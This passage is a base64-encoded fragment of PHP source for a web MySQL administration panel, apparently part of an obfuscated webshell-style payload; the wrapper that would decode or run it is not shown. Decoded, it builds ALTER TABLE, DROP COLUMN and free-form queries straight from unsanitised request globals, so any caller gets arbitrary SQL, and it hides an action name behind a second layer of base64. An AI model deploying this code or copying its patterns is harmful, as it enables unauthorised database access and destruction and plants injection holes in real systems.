bGlnbj1jZW50ZXI+TzwvdGQ+DQo8dGQ+Jm5ic3A8L3RkPg0KPC90cj4NCjx0cj4NCjx0ZD48aW5wdXQgdHlwZT1yYWRpbyBuYW1lPXR5cGUgdmFsdWU9IkRPVUJMRSIgJzsgaWYoICR0eXBlID09ICJkb3VibGUiICkgZWNobyAiY2hlY2tlZCI7ZWNobyAnPkRPVUJMRTwvdGQ+DQo8dGQgYWxpZ249Y2VudGVyPk88L3RkPg0KPHRkIGFsaWduPWNlbnRlcj5PPC90ZD4NCjx0ZD4mbmJzcDwvdGQ+DQo8dGQgYWxpZ249Y2VudGVyPk88L3RkPg0KPHRkPiZuYnNwPC90ZD4NCjwvdHI+DQo8dHI+DQo8dGQ+PGlucHV0IHR5cGU9cmFkaW8gbmFtZT10eXBlIHZhbHVlPSJERUNJTUFMIiAnOyBpZiggJHR5cGUgPT0gImRlY2ltYWwiICkgZWNobyAiY2hlY2tlZCI7ZWNobyAnPkRFQ0lNQUwoTlVNRVJJQyk8L3RkPg0KPHRkIGFsaWduPWNlbnRlcj5PPC90ZD4NCjx0ZCBhbGlnbj1jZW50ZXI+TzwvdGQ+DQo8dGQ+Jm5ic3A8L3RkPg0KPHRkIGFsaWduPWNlbnRlcj5PPC90ZD4NCjx0ZD4mbmJzcDwvdGQ+DQo8L3RyPg0KPHRyPg0KPHRkPjxpbnB1dCB0eXBlPXJhZGlvIG5hbWU9dHlwZSB2YWx1ZT0iREFURSIgJzsgaWYoICR0eXBlID09ICJkYXRlIiApIGVjaG8gImNoZWNrZWQiO2VjaG8gJz5EQVRFICgxMDAwLTAxLTAxIH4gOTk5OS0xMi0zMSwgWVlZWS1NTS1ERCk8L3RkPg0KPHRkPiZuYnNwPC90ZD4NCjx0ZD4mbmJzcDwvdGQ+DQo8dGQ+Jm5ic3A8L3RkPg0KPHRkPiZuYnNwPC90ZD4NCjx0ZD4mbmJzcDwvdGQ+DQo8L3RyPg0KPHRyPg0KPHRkPjxpbnB1dCB0eXBlPXJhZGlvIG5hbWU9dHlwZSB2YWx1ZT0iREFURVRJTUUiICc7IGlmKCAkdHlwZSA9PSAiZGF0ZXRpbWUiICkgZWNobyAiY2hlY2tlZCI7ZWNobyAnPkRBVEVUSU1FICgxMDAwLTAxLTAxIDAwOjAwOjAwIH4gOTk5OS0xMi0zMSAyMzo1OTo1OSwgWVlZWS1NTS1ERCBISDpNTTpTUyk8L3RkPg0KPHRkPiZuYnNwPC90ZD4NCjx0ZD4mbmJzcDwvdGQ+DQo8dGQ+Jm5ic3A8L3RkPg0KPHRkPiZuYnNwPC90ZD4NCjx0ZD4mbmJzcDwvdGQ+DQo8L3RyPg0KPHRyPg0KPHRkPjxpbnB1dCB0eXBlPXJhZGlvIG5hbWU9dHlwZSB2YWx1ZT0iVElNRVNUQU1QIiAnOyBpZiggJHR5cGUgPT0gInRpbWVzdGFtcCIgKSBlY2hvICJjaGVja2VkIjtlY2hvICc+VElNRVNUQU1QICgxOTcwLTAxLTAxIDAwOjAwOjAwIH4gMjEwNi4uLiwgWVlZWU1NRERbSEhbTU1bU1NdXV0pPC90ZD4NCjx0ZCBhbGlnbj1jZW50ZXI+TzwvdGQ+DQo8dGQ+Jm5ic3A8L3RkPg0KPHRkPiZuYnNwPC90ZD4NCjx0ZD4mbmJzcDwvdGQ+DQo8dGQ+Jm5ic3A8L3RkPg0KPC90cj4NCjx0cj4NCjx0ZD48aW5wdXQgdHlwZT1yYWRpbyBuYW1lPXR5cGUgdmFsdWU9IlRJTUUiICc7IGlmKCAkdHlwZSA9PSAidGltZSIgKSBlY2hvICJjaGVja2VkIjtlY2hvICc+VElNRSAoLTgzODo1OTo1OSB+IDgzODo1OTo1OSwgSEg6TU06U1MpPC90ZD4NCjx0ZD4mbmJzcDwvdGQ+DQo8dGQ+Jm5ic3A8L3RkPg0KPHRkPiZuYnNwPC90ZD4NCjx0ZD4mbmJzcDwvdGQ+DQo8dGQ+Jm5ic3A8L3RkPg0KPC90cj4NCjx0cj4NCjx0ZD48aW5wdXQgdHlwZT1yYWRpbyBuYW1lPXR5cGUgdmFsdWU9IllFQVIiICc7IGlmKCAkdHlwZSA9PSAieWVhciIgKSBlY2hvICJjaGVja2VkIjtlY2hvICc+WUVBUiAoMTkwMSB+IDIxNTUsIDAwMDAsIFlZWVkpPC90ZD4NCjx0ZD4mbmJzcDwvdGQ+DQo8dGQ+Jm5ic3A8L3RkPg0KPHRkPiZuYnNwPC90ZD4NCjx0ZD4mbmJzcDwvdGQ+DQo8dGQ+Jm5ic3A8L3RkPg0KPC90cj4NCjx0cj4NCjx0ZD48aW5wdXQgdHlwZT1yYWRpbyBuYW1lPXR5cGUgdmFsdWU9IkNIQVIiICc7IGlmKCAkdHlwZSA9PSAiY2hhciIgKSBlY2hvICJjaGVja2VkIjtlY2hvICc+Q0hBUjwvdGQ+DQo8dGQgYWxpZ249Y2VudGVyPk88L3RkPg0KPHRkPiZuYnNwPC90ZD4NCjx0ZD4mbmJzcDwvdGQ+DQo8dGQ+Jm5ic3A8L3RkPg0KPHRkIGFsaWduPWNlbnRlcj5PPC90ZD4NCjwvdHI+DQo8dHI+DQo8dGQ+PGlucHV0IHR5cGU9cmFkaW8gbmFtZT10eXBlIHZhbHVlPSJWQVJDSEFSIiAnOyBpZiggJHR5cGUgPT0gInZhcmNoYXIiICkgZWNobyAiY2hlY2tlZCI7ZWNobyAnPlZBUkNIQVI8L3RkPg0KPHRkIGFsaWduPWNlbnRlcj5PPC90ZD4NCjx0ZD4mbmJzcDwvdGQ+DQo8dGQ+Jm5ic3A8L3RkPg0KPHRkPiZuYnNwPC90ZD4NCjx0ZCBhbGlnbj1jZW50ZXI+TzwvdGQ+DQo8L3RyPg0KPHRyPg0KPHRkPjxpbnB1dCB0eXBlPXJhZGlvIG5hbWU9dHlwZSB2YWx1ZT0iVElOWVRFWFQiICc7IGlmKCAkdHlwZSA9PSAidGlueXRleHQiICkgZWNobyAiY2hlY2tlZCI7ZWNobyAnPlRJTllURVhUICgwIH4gMjU1KTwvdGQ+DQo8dGQ+Jm5ic3A8L3RkPg0KPHRkPiZuYnNwPC90ZD4NCjx0ZD4mbmJzcDwvdGQ+DQo8dGQ+Jm5ic3A8L3RkPg0KPHRkPiZuYnNwPC90ZD4NCjwvdHI+DQo8dHI+DQo8dGQ+PGlucHV0IHR5cGU9cmFkaW8gbmFtZT10eXBlIHZhbHVlPSJURVhUIiAnOyBpZiggJHR5cGUgPT0gInRleHQiICkgZWNobyAiY2hlY2tlZCI7ZWNobyAnPlRFWFQgKDAgfiA2NTUzNSk8L3RkPg0KPHRkPiZuYnNwPC90ZD4NCjx0ZD4mbmJzcDwvdGQ+DQo8dGQ+Jm5ic3A8L3RkPg0KPHRkPiZuYnNwPC90ZD4NCjx0ZD4mbmJzcDwvdGQ+DQo8L3RyPg0KPHRyPg0KPHRkPjxpbnB1dCB0eXBlPXJhZGlvIG5hbWU9dHlwZSB2YWx1ZT0iTUVESVVNVEVYVCIgJzsgaWYoICR0eXBlID09ICJtZWRpdW10ZXh0IiApIGVjaG8gImNoZWNrZWQiO2VjaG8gJz5NRURJVU1URVhUICgwIH4gMTY3NzcyMTUpPC90ZD4NCjx0ZD4mbmJzcDwvdGQ+DQo8dGQ+Jm5ic3A8L3RkPg0KPHRkPiZuYnNwPC90ZD4NCjx0ZD4mbmJzcDwvdGQ+DQo8dGQ+Jm5ic3A8L3RkPg0KPC90cj4NCjx0cj4NCjx0ZD48aW5wdXQgdHlwZT1yYWRpbyBuYW1lPXR5cGUgdmFsdWU9IkxPTkdURVhUIiAnOyBpZiggJHR5cGUgPT0gImxvbmd0ZXh0IiApIGVjaG8gImNoZWNrZWQiO2VjaG8gJz5MT05HVEVYVCAoMCB+IDQyOTQ5NjcyOTUpPC90ZD4NCjx0ZD4mbmJzcDwvdGQ+DQo8dGQ+Jm5ic3A8L3RkPg0KPHRkPiZuYnNwPC90ZD4NCjx0ZD4mbmJzcDwvdGQ+DQo8dGQ+Jm5ic3A8L3RkPg0KPC90cj4NCjx0cj4NCjx0ZD48aW5wdXQgdHlwZT1yYWRpbyBuYW1lPXR5cGUgdmFsdWU9IlRJTllCTE9CIiAnOyBpZiggJHR5cGUgPT0gInRpbnlibG9iIiApIGVjaG8gImNoZWNrZWQiO2VjaG8gJz5USU5ZQkxPQiAoMCB+IDI1NSk8L3RkPg0KPHRkPiZuYnNwPC90ZD4NCjx0ZD4mbmJzcDwvdGQ+DQo8dGQ+Jm5ic3A8L3RkPg0KPHRkPiZuYnNwPC90ZD4NCjx0ZD4mbmJzcDwvdGQ+DQo8L3RyPg0KPHRyPg0KPHRkPjxpbnB1dCB0eXBlPXJhZGlvIG5hbWU9dHlwZSB2YWx1ZT0iQkxPQiIgJzsgaWYoICR0eXBlID09ICJibG9iIiApIGVjaG8gImNoZWNrZWQiO2VjaG8gJz5CTE9CICgwIH4gNjU1MzUpPC90ZD4NCjx0ZD4mbmJzcDwvdGQ+DQo8dGQ+Jm5ic3A8L3RkPg0KPHRkPiZuYnNwPC90ZD4NCjx0ZD4mbmJzcDwvdGQ+DQo8dGQ+Jm5ic3A8L3RkPg0KPC90cj4NCjx0cj4NCjx0ZD48aW5wdXQgdHlwZT1yYWRpbyBuYW1lPXR5cGUgdmFsdWU9Ik1FRElVTUJMT0IiICc7IGlmKCAkdHlwZSA9PSAibWVkaXVtYmxvYiIgKSBlY2hvICJjaGVja2VkIjtlY2hvICc+TUVESVVNQkxPQiAoMCB+IDE2Nzc3MjE1KTwvdGQ+DQo8dGQ+Jm5ic3A8L3RkPg0KPHRkPiZuYnNwPC90ZD4NCjx0ZD4mbmJzcDwvdGQ+DQo8dGQ+Jm5ic3A8L3RkPg0KPHRkPiZuYnNwPC90ZD4NCjwvdHI+DQo8dHI+DQo8dGQ+PGlucHV0IHR5cGU9cmFkaW8gbmFtZT10eXBlIHZhbHVlPSJMT05HQkxPQiIgJzsgaWYoICR0eXBlID09ICJsb25nYmxvYiIgKSBlY2hvICJjaGVja2VkIjtlY2hvICc+TE9OR0JMT0IgKDAgfiA0Mjk0OTY3Mjk1KTwvdGQ+DQo8dGQ+Jm5ic3A8L3RkPg0KPHRkPiZuYnNwPC90ZD4NCjx0ZD4mbmJzcDwvdGQ+DQo8dGQ+Jm5ic3A8L3RkPg0KPHRkPiZuYnNwPC90ZD4NCjwvdHI+DQo8dHI+DQo8dGQ+PGlucHV0IHR5cGU9cmFkaW8gbmFtZT10eXBlIHZhbHVlPSJFTlVNIiAnOyBpZiggJHR5cGUgPT0gImVudW0iICkgZWNobyAiY2hlY2tlZCI7ZWNobyAnPkVOVU08L3RkPg0KPHRkIGNvbHNwYW49NT48Y2VudGVyPnZhbHVlIGxpc3Q8L2NlbnRlcj48L3RkPg0KPC90cj4NCjx0cj4NCjx0ZD48aW5wdXQgdHlwZT1yYWRpbyBuYW1lPXR5cGUgdmFsdWU9IlNFVCIgJzsgaWYoICR0eXBlID09ICJzZXQiICkgZWNobyAiY2hlY2tlZCI7ZWNobyAnPlNFVDwvdGQ+DQo8dGQgY29sc3Bhbj01PjxjZW50ZXI+dmFsdWUgbGlzdDwvY2VudGVyPjwvdGQ+DQo8L3RyPg0KPC90YWJsZT4NCjx0YWJsZT4NCjx0cj48dGg+TTwvdGg+PHRoPkQ8L3RoPjx0aD51bnNpZ25lZDwvdGg+PHRoPnplcm9maWxsPC90aD48dGg+YmluYXJ5PC90aD48dGg+dmFsdWUgbGlzdCAoZXg6IFwnYXBwbGVcJywgXCdvcmFuZ2VcJywgXCdiYW5hbmFcJykgPC90aD48L3RyPg0KPHRyPg0KPHRkIGFsaWduPWNlbnRlcj48aW5wdXQgdHlwZT10ZXh0IHNpemU9NCBuYW1lPU0gJzsgaWYoICRNICE9ICIiICkgZWNobyAidmFsdWU9JE0iO2VjaG8gJz48L3RkPg0KPHRkIGFsaWduPWNlbnRlcj48aW5wdXQgdHlwZT10ZXh0IHNpemU9NCBuYW1lPUQgJzsgaWYoICREICE9ICIiICkgZWNobyAidmFsdWU9JEQiO2VjaG8gJz48L3RkPg0KPHRkIGFsaWduPWNlbnRlcj48aW5wdXQgdHlwZT1jaGVja2JveCBuYW1lPXVuc2lnbmVkIHZhbHVlPSJVTlNJR05FRCIgJzsgaWYoIHN0cnBvcyggJGZpZWxkdHlwZSwgInVuc2lnbmVkIiApICkgZWNobyAiY2hlY2tlZCI7ZWNobyAnPjwvdGQ+DQo8dGQgYWxpZ249Y2VudGVyPjxpbnB1dCB0eXBlPWNoZWNrYm94IG5hbWU9emVyb2ZpbGwgdmFsdWU9IlpFUk9GSUxMIiAnOyBpZiggc3RycG9zKCAkZmllbGR0eXBlLCAiemVyb2ZpbGwiICkgKSBlY2hvICJjaGVja2VkIjtlY2hvICc+PC90ZD4NCjx0ZCBhbGlnbj1jZW50ZXI+PGlucHV0IHR5cGU9Y2hlY2tib3ggbmFtZT1iaW5hcnkgdmFsdWU9IkJJTkFSWSIgJzsgaWYoIHN0cnBvcyggJGZpZWxkdHlwZSwgImJpbmFyeSIgKSAgKSBlY2hvICJjaGVja2VkIjtlY2hvICc+PC90ZD4NCjx0ZCBhbGlnbj1jZW50ZXI+PGlucHV0IHR5cGU9dGV4dCBzaXplPTYwIG5hbWU9dmFsdWVsaXN0ICc7IGlmKCAkdmFsdWVsaXN0ICE9ICIiICkgZWNobyAidmFsdWU9XCIkdmFsdWVsaXN0XCIiO2VjaG8gJz48L3RkPg0KPC90cj4NCjwvdGFibGU+DQo8aDM+RmxhZ3M8L2gzPg0KPHRhYmxlPg0KPHRyPjx0aD5ub3QgbnVsbDwvdGg+PHRoPmRlZmF1bHQgdmFsdWU8L3RoPjx0aD5hdXRvIGluY3JlbWVudDwvdGg+PHRoPnByaW1hcnkga2V5PC90aD48L3RyPg0KPHRyPg0KPHRkIGFsaWduPWNlbnRlcj48aW5wdXQgdHlwZT1jaGVja2JveCBuYW1lPW5vdF9udWxsIHZhbHVlPSJOT1QgTlVMTCIgJzsgaWYoICRmaWVsZG51bGwgIT0gIllFUyIgKSBlY2hvICJjaGVja2VkIjtlY2hvICc+PC90ZD4NCjx0ZCBhbGlnbj1jZW50ZXI+PGlucHV0IHR5cGU9dGV4dCBuYW1lPWRlZmF1bHRfdmFsdWUgJzsgaWYoICRmaWVsZGRlZmF1bHQgIT0gIiIgKSBlY2hvICJ2YWx1ZT0kZmllbGRkZWZhdWx0IjtlY2hvICc+PC90ZD4NCjx0ZCBhbGlnbj1jZW50ZXI+PGlucHV0IHR5cGU9Y2hlY2tib3ggbmFtZT1hdXRvX2luY3JlbWVudCB2YWx1ZT0iQVVUT19JTkNSRU1FTlQiICc7IGlmKCAkZmllbGRleHRyYSA9PSAiYXV0b19pbmNyZW1lbnQiICkgZWNobyAiY2hlY2tlZCI7ZWNobyAnPjwvdGQ+DQo8dGQgYWxpZ249Y2VudGVyPjxpbnB1dCB0eXBlPWNoZWNrYm94IG5hbWU9cHJpbWFyeV9rZXkgdmFsdWU9IlBSSU1BUlkgS0VZIiAnOyBpZiggJGZpZWxka2V5ID09ICJQUkkiICkgZWNobyAiY2hlY2tlZCI7ZWNobyAnPjwvdGQ+DQo8L3RyPg0KPC90YWJsZT4NCjxwPic7DQoJaWYoICRjbWQgPT0gImFkZCIgKQ0KCQllY2hvICI8aW5wdXQgdHlwZT1zdWJtaXQgdmFsdWU9J0FkZCBGaWVsZCc+XG4iOw0KCWVsc2UgaWYoICRjbWQgPT0gImVkaXQiICkNCgkJZWNobyAiPGlucHV0IHR5cGU9c3VibWl0IHZhbHVlPSdFZGl0IEZpZWxkJz5cbiI7DQoJZWNobyAiPGlucHV0IHR5cGU9YnV0dG9uIHZhbHVlPUNhbmNlbCBvbkNsaWNrPSdoaXN0b3J5LmJhY2soKSc+XG4iOw0KCWVjaG8gIjwvZm9ybT5cbiI7DQp9DQoNCmZ1bmN0aW9uIG1hbmFnZUZpZWxkX3N1Ym1pdCggJGNtZCApIHsNCglnbG9iYWwgJG15c3FsSGFuZGxlLCAkZGJuYW1lLCAkdGFibGVuYW1lLCAkb2xkX25hbWUsICRuYW1lLCAkdHlwZSwgJFBIUF9TRUxGLCAkcXVlcnlTdHIsICRlcnJNc2csDQoJCSRNLCAkRCwgJHVuc2lnbmVkLCAkemVyb2ZpbGwsICRiaW5hcnksICRub3RfbnVsbCwgJGRlZmF1bHRfdmFsdWUsICRhdXRvX2luY3JlbWVudCwgJHByaW1hcnlfa2V5LCAkdmFsdWVsaXN0Ow0KCWlmKCAkY21kID09ICJhZGQiICkNCgkJJHF1ZXJ5U3RyID0gIkFMVEVSIFRBQkxFICR0YWJsZW5hbWUgQUREICRuYW1lICI7DQoJZWxzZSBpZiggJGNtZCA9PSAiZWRpdCIgKQ0KCQkkcXVlcnlTdHIgPSAiQUxURVIgVEFCTEUgJHRhYmxlbmFtZSBDSEFOR0UgJG9sZF9uYW1lICRuYW1lICI7DQoJaWYoICRNICE9ICIiICkNCgkJaWYoICREICE9ICIiICkNCgkJCSRxdWVyeVN0ciAuPSAiJHR5cGUoJE0sJEQpICI7DQoJCWVsc2UNCgkJCSRxdWVyeVN0ciAuPSAiJHR5cGUoJE0pICI7DQoJZWxzZSBpZiggJHZhbHVlbGlzdCAhPSAiIiApIHsNCgkJJHZhbHVlbGlzdCA9IHN0cmlwc2xhc2hlcyggJHZhbHVlbGlzdCApOw0KCQkkcXVlcnlTdHIgLj0gIiR0eXBlKCR2YWx1ZWxpc3QpICI7DQoJfSBlbHNlDQoJCSRxdWVyeVN0ciAuPSAiJHR5cGUgIjsNCgkkcXVlcnlTdHIgLj0gIiR1bnNpZ25lZCAkemVyb2ZpbGwgJGJpbmFyeSAiOw0KCWlmKCAkZGVmYXVsdF92YWx1ZSAhPSAiIiApDQoJCSRxdWVyeVN0ciAuPSAiREVGQVVMVCAnJGRlZmF1bHRfdmFsdWUnICI7DQoJJHF1ZXJ5U3RyIC49ICIkbm90X251bGwgJGF1dG9faW5jcmVtZW50IjsNCglteXNxbF9zZWxlY3RfZGIoICRkYm5hbWUsICRteXNxbEhhbmRsZSApOw0KCW15c3FsX3F1ZXJ5KCAkcXVlcnlTdHIsICRteXNxbEhhbmRsZSApOw0KCSRlcnJNc2cgPSBteXNxbF9lcnJvcigpOw0KCS8vIGtleSBjaGFuZ2UNCgkka2V5Q2hhbmdlID0gZmFsc2U7DQoJJHJlc3VsdCA9IG15c3FsX3F1ZXJ5KCAiU0hPVyBLRVlTIEZST00gJHRhYmxlbmFtZSIgKTsNCgkkcHJpbWFyeSA9ICIiOw0KCXdoaWxlKCAkcm93ID0gbXlzcWxfZmV0Y2hfYXJyYXkoJHJlc3VsdCkgKQ0KCQlpZiggJHJvd1siS2V5X25hbWUiXSA9PSAiUFJJTUFSWSIgKSB7DQoJCQlpZiggJHJvd1tDb2x1bW5fbmFtZV0gPT0gJG5hbWUgKQ0KCQkJCSRrZXlDaGFuZ2UgPSB0cnVlOw0KCQkJZWxzZQ0KCQkJCSRwcmltYXJ5IC49ICIsICRyb3dbQ29sdW1uX25hbWVdIjsNCgkJfQ0KCWlmKCAkcHJpbWFyeV9rZXkgPT0gIlBSSU1BUlkgS0VZIiApIHsNCgkJJHByaW1hcnkgLj0gIiwgJG5hbWUiOw0KCQkka2V5Q2hhbmdlID0gISRrZXlDaGFuZ2U7DQoJfQ0KCSRwcmltYXJ5ID0gc3Vic3RyKCAkcHJpbWFyeSwgMiApOw0KCWlmKCAka2V5Q2hhbmdlID09IHRydWUgKSB7DQoJCSRxID0gIkFMVEVSIFRBQkxFICR0YWJsZW5hbWUgRFJPUCBQUklNQVJZIEtFWSI7DQoJCW15c3FsX3F1ZXJ5KCAkcSApOw0KCQkkcXVlcnlTdHIgLj0gIjxicj5cbiIgLiAkcTsNCgkJJGVyck1zZyAuPSAiPGJyPlxuIiAuIG15c3FsX2Vycm9yKCk7DQoJCSRxID0gIkFMVEVSIFRBQkxFICR0YWJsZW5hbWUgQUREIFBSSU1BUlkgS0VZKCAkcHJpbWFyeSApIjsNCgkJbXlzcWxfcXVlcnkoICRxICk7DQoJCSRxdWVyeVN0ciAuPSAiPGJyPlxuIiAuICRxOw0KCQkkZXJyTXNnIC49ICI8YnI+XG4iIC4gbXlzcWxfZXJyb3IoKTsNCgl9DQoJdmlld1NjaGVtYSgpOw0KfQ0KDQpmdW5jdGlvbiBkcm9wRmllbGQoKSB7DQoJZ2xvYmFsICRteXNxbEhhbmRsZSwgJGRibmFtZSwgJHRhYmxlbmFtZSwgJGZpZWxkbmFtZSwgJFBIUF9TRUxGLCAkcXVlcnlTdHIsICRlcnJNc2c7DQoJJHF1ZXJ5U3RyID0gIkFMVEVSIFRBQkxFICR0YWJsZW5hbWUgRFJPUCBDT0xVTU4gJGZpZWxkbmFtZSI7DQoJbXlzcWxfc2VsZWN0X2RiKCAkZGJuYW1lLCAkbXlzcWxIYW5kbGUgKTsNCglteXNxbF9xdWVyeSggJHF1ZXJ5U3RyICwgJG15c3FsSGFuZGxlICk7DQoJJGVyck1zZyA9IG15c3FsX2Vycm9yKCk7DQoJdmlld1NjaGVtYSgpOw0KfQ0KDQpmdW5jdGlvbiB2aWV3RGF0YSggJHF1ZXJ5U3RyICkgew0KCWdsb2JhbCAkYWN0aW9uLCAkbXlzcWxIYW5kbGUsICRkYm5hbWUsICR0YWJsZW5hbWUsICRQSFBfU0VMRiwgJGVyck1zZywgJHBhZ2UsICRyb3dwZXJwYWdlLCAkb3JkZXJieTsNCgllY2hvICI8aDE+RGF0YSBpbiBUYWJsZTwvaDE+XG4iOw0KCWlmKCAkdGFibGVuYW1lICE9ICIiICkNCgkJZWNobyAiPHAgY2xhc3M9bG9jYXRpb24+JGRibmFtZSAmZ3Q7ICR0YWJsZW5hbWU8L3A+XG4iOw0KCWVsc2UNCgkJZWNobyAiPHAgY2xhc3M9bG9jYXRpb24+JGRibmFtZTwvcD5cbiI7DQoJJHF1ZXJ5U3RyID0gc3RyaXBzbGFzaGVzKCAkcXVlcnlTdHIgKTsNCglpZiggJHF1ZXJ5U3RyID09ICIiICkgew0KCQkkcXVlcnlTdHIgPSAiU0VMRUNUICogRlJPTSAkdGFibGVuYW1lIjsNCgkJaWYoICRvcmRlcmJ5ICE9ICIiICkNCgkJCSRxdWVyeVN0ciAuPSAiIE9SREVSIEJZICRvcmRlcmJ5IjsNCgkJZWNobyAiPGEgaHJlZj0nJFBIUF9TRUxGP2FjdGlvbj1hZGREYXRhJmRibmFtZT0kZGJuYW1lJnRhYmxlbmFtZT0kdGFibGVuYW1lJz5BZGQgRGF0YTwvYT4gfCBcbiI7DQoJCWVjaG8gIjxhIGhyZWY9JyRQSFBfU0VMRj9hY3Rpb249dmlld1NjaGVtYSZkYm5hbWU9JGRibmFtZSZ0YWJsZW5hbWU9JHRhYmxlbmFtZSc+U2NoZW1hPC9hPlxuIjsNCgl9DQoJJHBSZXN1bHQgPSBteXNxbF9kYl9xdWVyeSggJGRibmFtZSwgJHF1ZXJ5U3RyICk7DQoJJGZpZWxkdCA9IG15c3FsX2ZldGNoX2ZpZWxkKCRwUmVzdWx0KTsNCgkkdGFibGVuYW1lID0gJGZpZWxkdC0+dGFibGU7DQoJJGVyck1zZyA9IG15c3FsX2Vycm9yKCk7DQoJJEdMT0JBTFNbcXVlcnlTdHJdID0gJHF1ZXJ5U3RyOw0KCWlmKCAkcFJlc3VsdCA9PSBmYWxzZSApIHsNCgkJZWNob1F1ZXJ5UmVzdWx0KCk7DQoJCXJldHVybjsNCgl9DQoJaWYoICRwUmVzdWx0ID09IDEgKSB7DQoJCSRlcnJNc2cgPSAiU3VjY2VzcyI7DQoJCWVjaG9RdWVyeVJlc3VsdCgpOw0KCQlyZXR1cm47DQoJfQ0KCWVjaG8gIjxocj5cbiI7DQoJJHJvdyA9IG15c3FsX251bV9yb3dzKCAkcFJlc3VsdCApOw0KCSRjb2wgPSBteXNxbF9udW1fZmllbGRzKCAkcFJlc3VsdCApOw0KCWlmKCAkcm93ID09IDAgKSB7DQoJCWVjaG8gIk5vIERhdGEgRXhpc3QhIjsNCgkJcmV0dXJuOw0KCX0NCglpZiggJHJvd3BlcnBhZ2UgPT0gIiIgKSAkcm93cGVycGFnZSA9IDMwOw0KCWlmKCAkcGFnZSA9PSAiIiApICRwYWdlID0gMDsNCgllbHNlICRwYWdlLS07DQoJbXlzcWxfZGF0YV9zZWVrKCAkcFJlc3VsdCwgJHBhZ2UgKiAkcm93cGVycGFnZSApOw0KCWVjaG8gIjx0YWJsZSBjZWxsc3BhY2luZz0xIGNlbGxwYWRkaW5nPTI+XG4iOw0KCWVjaG8gIjx0cj5cbiI7DQoJZm9yKCAkaSA9IDA7ICRpIDwgJGNvbDsgJGkrKyApIHsNCgkJJGZpZWxkID0gbXlzcWxfZmV0Y2hfZmllbGQoICRwUmVzdWx0LCAkaSApOw0KCQllY2hvICI8dGg+IjsNCgkJaWYoJGFjdGlvbiA9PSAiZG1sbGQwUmhkR0U9IikNCgkJCWVjaG8gIjxhIGhyZWY9JyRQSFBfU0VMRj9hY3Rpb249ZG1sbGQwUmhkR0U9JmRibmFtZT0kZGJuYW1lJnRhYmxlbmFtZT0kdGFibGVuYW1lJm9yZGVyYnk9Ii4kZmllbGQtPm5hbWUuIic+Ii4kZmllbGQtPm5hbWUuIjwvYT5cbiI7DQoJCWVsc2UNCgkJCWVjaG8gJGZpZWxkLT5uYW1lLiJcbiI7DQoJCWVjaG8gIjwvdGg+XG4iOw0KCX0NCgllY2hvICI8dGggY29sc3Bhbj0yPkFjdGlvbjwvdGg+XG4iOw0KCWVjaG8gIjwvdHI+XG4iOw0KCWZvciggJGkgPSAwOyAkaSA8ICRyb3dwZXJwYWdlOyAkaSsrICkgew0KCQkkcm93QXJyYXkgPSBteXNxbF9mZXRjaF9yb3coICRwUmVzdWx0ICk7DQoJCWlmKCAkcm93QXJyYXkgPT0gZmFsc2UgKSBicmVhazsNCgkJZWNobyAiPHRyPlxuIjsNCgkJJGtleSA9ICIiOw0KCQlmb3IoICRqID0gMDsgJGogPCAkY29sOyAkaisrICkgew0KCQkJJGRhdGEgPSAkcm93QXJyYXlbJGpdOw0KCQkJJGZpZWxkID0gbXlzcWxfZmV0Y2hfZmllbGQoICRwUmVzdWx0LCAkaiApOw0KCQkJaWYoICRmaWVsZC0+cHJpbWFyeV9rZXkgPT0gMSApDQoJCQkJJGtleSAuPSAiJiIgLiAkZmllbGQtPm5hbWUgLiAiPSIgLiAkZGF0YTsNCgkJCWlmKCBzdHJsZW4oICRkYXRhICkgPiAzMCApDQoJCQkJJGRhdGEgPSBzdWJzdHIoICRkYXRhLCAwLCAzMCApIC4gIi4uLiI7DQoJCQkkZGF0YSA9IGh0bWxzcGVjaWFsY2hhcnMoICRkYXRhICk7DQoJCQllY2hvICI8dGQ+XG4iOw0KCQkJZWNobyAiJGRhdGFcbiI7DQoJCQllY2hvICI8L3RkPlxuIjsNCgkJfQ0KCQlpZiggJGtleSA9PSAiIiApDQoJCQllY2hvICI8dGQgY29sc3Bhbj0yPm5vIEtleTwvdGQ+XG4iOw0KCQllbHNlIHsNCgkJCWVjaG8gIjx0ZD48YSBocmVmPSckUEhQX1NFTEY/YWN0aW9uPWVkaXREYXRhJGtleSZkYm5hbWU9JGRibmFtZSZ0YWJsZW5hbWU9JHRhYmxlbmFtZSc+RWRpdDwvYT48L3RkPlxuIjsNCgkJCWVjaG8gIjx0ZD48YSBocmVmPSckUEhQX1NFTEY/YWN0aW9uPWRlbGV0ZURhdGEka2V5JmRibmFtZT0kZGJuYW1lJnRhYmxlbmFtZT0kdGFibGVuYW1lJyBvbkNsaWNrPVwicmV0dXJuIGNvbmZpcm0oJ0RlbGV0ZSBSb3c/JylcIj5EZWxldGU8L2E+PC90ZD5cbiI7DQoJCX0NCgkJZWNobyAiPC90cj5cbiI7DQoJfQ0KCWVjaG8gIjwvdGFibGU+XG4iOw0KCWVjaG8gIjxmb250IHNpemU9MiBjbGFzcz1cIm5ld1wiPlxuIjsNCglpZigkYWN0aW9uID09ICJkbWxsZDBSaGRHRT0iKQ0KCQllY2hvICI8Zm9ybSBhY3Rpb249JyRQSFBfU0VMRj9hY3Rpb249ZG1sbGQwUmhkR0U9JmRibmFtZT0kZGJuYW1lJnRhYmxlbmFtZT0kdGFibGVuYW1lJyBtZXRob2Q9cG9zdD5cbiI7DQoJZWxzZQ0KCQllY2hvICI8Zm9ybSBhY3Rpb249JyRQSFBfU0VMRj9hY3Rpb249cXVlcnkmZGJuYW1lPSRkYm5hbWUmdGFibGVuYW1lPSR0YWJsZW5hbWUmcXVlcnlTdHI9JHF1ZXJ5U3RyJyBtZXRob2Q9cG9zdD5cbiI7DQoJZWNobyAoJHBhZ2UrMSkuIi8iLihpbnQpKCRyb3cvJHJvd3BlcnBhZ2UrMSkuIiBwYWdlIjsNCgllY2hvICI8L2ZvbnQ+XG4iOw0KCWVjaG8gIiB8ICI7DQoJaWYoICRwYWdlID4gMCApIHsNCgkJaWYoJGFjdGlvbiA9PSAiZG1sbGQwUmhkR0U9IikNCgkJCWVjaG8gIjxhIGhyZWY9JyRQSFBfU0VMRj9hY3Rpb249ZG1sbGQwUmhkR0U9JmRibmFtZT0kZGJuYW1lJnRhYmxlbmFtZT0kdGFibGVuYW1lJnBhZ2U9Ii4oJHBhZ2UpOw0KCQllbHNlDQoJCQllY2hvICI8YSBocmVmPSckUEhQX1NFTEY/YWN0aW9uPXF1ZXJ5JmRibmFtZT0kZGJuYW1lJnRhYmxlbmFtZT0kdGFibGVuYW1lJnF1ZXJ5U3RyPSRxdWVyeVN0ciZwYWdlPSIuKCRwYWdlKTsNCgkJaWYoICRvcmRlcmJ5ICE9ICI